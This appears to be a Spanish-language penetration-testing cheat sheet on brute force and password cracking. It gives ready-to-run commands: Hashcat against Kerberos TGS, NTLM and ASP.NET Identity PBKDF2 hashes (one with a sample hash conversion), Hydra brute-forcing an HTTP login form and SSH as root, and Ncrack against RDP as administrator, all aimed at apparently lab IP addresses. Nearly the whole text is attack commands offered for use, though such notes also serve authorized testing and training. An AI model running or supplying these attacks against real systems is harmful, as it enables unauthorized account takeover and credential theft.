Fuerza bruta & Cracking

Hashcat - kerberos (SPN, AS-RES Roasting, Contrained Delegation..)

hashcat -m 13100 -a 0 hashes.txt rockyou.txt

Hashcat - NTLM con reglas (lsadump::SAM)

hashcat -m 1000 -a 0 hashes.txt tools/SecLists/Passwords/xato-net-10-million-passwords-1000000.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --force

Hashcat - Cracking ASP.net Core Identity (PBKDF2+HMAC-SHA256 / PBKDF2+HMAC-SHA1)

#Convertir el Hash de ASP.net Identity en PBKDF2+HMAC-SHA256 / PBKDF2+HMAC-SHA1
#https://github.com/edernucci/identity-to-hashcat

$ ./identity-to-hashcat.sh AQAAAAEAACcQAAAAEG7xx8smhzcYFaAhPSRj1rgxfAoqKBv4WM/4R+Z0SvFxtxuMkfgBS28p1MQzvV0OeQ==
sha256:10000:bvHHyyaHNxgVoCE9JGPWuA==:MXwKKigb+FjP+EfmdErxcbcbjJH4AUtvKdTEM71dDnk=

#Crackear con hashcat
hashcat -m 10900 -a 0 hash.txt passwords.txt

Hydra - http-post

hydra 10.11.1.223 -l admin -P /usr/share/john/password.lst http-post-form "/index.php?admin=login:submit_login=login&type=admin&user_name=admin&password=^PASS^&submit=Login:Wrong username or password" -V

Hydra - SSH

hydra -l root -P /root/tools/SecLists/Passwords/Common-Credentials/best1050.txt -t 4 ssh://10.11.1.71:22

Ncrack -RDP

ncrack -u administrator -P 500-worst-passwords.txt -p 3389 10.212.50.21

Last updated